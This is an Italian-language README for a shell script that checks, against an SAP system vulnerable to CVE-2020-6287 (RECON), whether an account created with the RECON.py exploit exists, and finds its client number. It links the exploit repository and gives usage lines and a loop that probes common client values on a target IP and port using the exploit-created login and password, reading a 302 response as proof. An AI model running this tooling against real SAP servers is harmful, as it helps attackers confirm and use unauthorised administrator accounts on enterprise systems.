
Checker aiuta a verificare un account creato o trovare il suo mandato.
Checker per verificare se un account è stato creato o trovare il suo mandato
Lo script permette di verificare se l'account è stato creato usando l'exploit RECON.py o trovare il mandato dell'account creato
https://github.com/chipik/SAP_RECON
chmod +x
./checker_CVE-2020-6287.sh <start mndt> <stop mndt> <ip> <port> <login> <password>
- <start mndt> : primo valore del mandato per iterare (000-999) utile per me 000,001,002,003,004,005,006,007,008,009,066,100,150,200,500,520
- <stop mndt> : ultimo valore per iterare
- <ip> : indirizzo IP dell'host vulnerabile
- <port> : endpoint del servizio vulnerabile
- <login> : login creato con RECON.py
- <password> : password creata con RECON.py
for i in {000,001,002,003,004,005,006,007,008,009,066,100,150,200,500,520}; do ./checker_CVE-2020-6287.sh ${i} ${i} <ip> <port> <login> <password>;done

Il primo valore è un mandato. Il codice 302 indica che l'utente esiste.